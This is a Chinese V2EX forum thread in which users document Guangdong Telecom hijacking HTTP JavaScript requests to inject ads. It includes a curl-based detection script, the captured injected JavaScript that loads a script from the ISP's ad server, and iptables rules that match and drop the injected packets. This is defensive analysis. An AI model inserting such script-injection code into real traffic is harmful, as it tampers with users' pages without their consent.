电信宽带流量劫持广告复现过程

2018-03-29 15:09:27 +08:00
 mario85

已知广东电信宽带会随机弹出广告窗口(无图,见过的都知道),由于出现得比较随机,一直不太好复现,这几天有点时间研究了下,写了个脚本复现:

host='mat1.gtimg.com'
path='/www/asset/seajs/sea.js'
referer='http://www.qq.com/'
useragent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'

while :
do
   hostips=$(nslookup $host|grep -Po '(?<=Address: ).*$')
   count=$(echo -e "$hostips"|wc -l)
   randresolv=$(echo -e "$hostips"|tail -$((1+RANDOM%count))|head -1)
   date=$(date)
   content=$(curl -s -N --no-keepalive http://$randresolv$path -H "Host: $host" -H "User-Agent: $useragent" -H "Referer: $referer" -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache')
   if echo $content|grep -q 183.59; then
      logtext=$(echo "ChinaTelecom javascript hijacking detected - $randresolv - $date")
      printf "\n$logtext"
      echo $logtext >> ./checklog
      echo $content > ./capturedcontent
   else
      printf .
   fi
   sleep 10
done

电信只劫持 URL 以.js 结尾、有 Referer 头的 HTTP 请求,上网随便找个 js,以腾讯首页中的 SeaJS 为例,将相应信息填入脚本中的host path referer 变量,执行脚本,一段时间(可达一两个小时)后即可出现劫持,劫持频率大概是每 1 到 10 个请求随机出现一次劫持。

运行效果如下图所示: http://ww2.sinaimg.cn/large/0060lm7Tly1fptp6dvpy0j30h20933z0.jpg

劫持后替换的内容:

var _atn_obj_ = new Object; 
 _atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745'; 
 _atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP'; 
 window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
 window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

不知道这样算不算是实锤,如果算的话周末准备投诉到 10000,若不见效将写详细报告投诉到工信部

3921 次点击
所在节点    宽带症候群
24 条回复
feng0vx
2018-04-01 12:33:22 +08:00
没用的,工信部现在都没用了,我投诉过广告的事情,他们回电话说合同上没有约束,他们管不了
wr410
2018-04-01 13:36:07 +08:00
很多年前写的博文,直接拉到最后,了解一下
https://blog.csdn.net/wr410/article/details/25594273
wolfie
2018-04-02 15:24:07 +08:00
给客服打电话可以关。
https 都劫持 有什么隐私可言呢
LGA1150
2018-05-24 01:05:40 +08:00
我似乎抓到劫持包了
似乎所有的劫持包都有一个变量"_atn_obj_"
于是用 iptables 关键字匹配:
iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m string --string "_atn_obj_" --algo bm -j LOG
同时后台开着 tcpdump
直到内核日志中出现一条:
[54945.458949] IN=pppoe-wan OUT=ct MAC= SRC=119.23.80.130 DST=10.2.1.2 LEN=894 TOS=0x00 PREC=0x00 TTL=56 ID=9997 DF PROTO=TCP SPT=80 DPT=45021 WINDOW=256 RES=0x00 ACK PSH URGP=0

然后我过滤抓包结果:
00:35:20.051969 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [S], seq 296045250, win 64240, options [mss 1432,sackOK,TS val 3110253 ecr 0,nop,wscale 8], length 0
00:35:20.060124 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [S.], seq 4085280, ack 296045251, win 14600, options [mss 1444,nop,nop,sackOK,nop,wscale 7], length 0
00:35:20.071531 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1, win 251, length 0
00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1
00:35:20.081913 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1433, win 137, length 0
00:35:20.082025 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1530, win 137, length 0
00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified
00:35:20.106128 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 245, win 256, length 0
00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1
00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP
00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0
00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.154660 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:20.361116 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.394913 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:20.582203 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.799507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.817570 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:21.021165 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:21.675574 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:21.715799 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:21.904377 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:23.427507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:23.454270 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:26.931735 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:27.118104 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [R], seq 296048290, win 0, length 0

可以看到
00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
这个就是返回的 200 劫持,而真正的服务器返回的是
00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified

根据关键字、TCP FLAGS 和 TTL 匹配包并 DROP 掉
iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m ttl --ttl-eq 55 --tcp-flags ALL PSH,ACK -m string --string "_atn_obj_" --algo bm -j DROP

存放广告内容的服务器 IP 有 183.59.53.187 183.59.53.188 183.59.53.224 ,po 主的是 183.59.53.197 ,看来可以放心地把整段 IP 屏蔽了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/442509

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX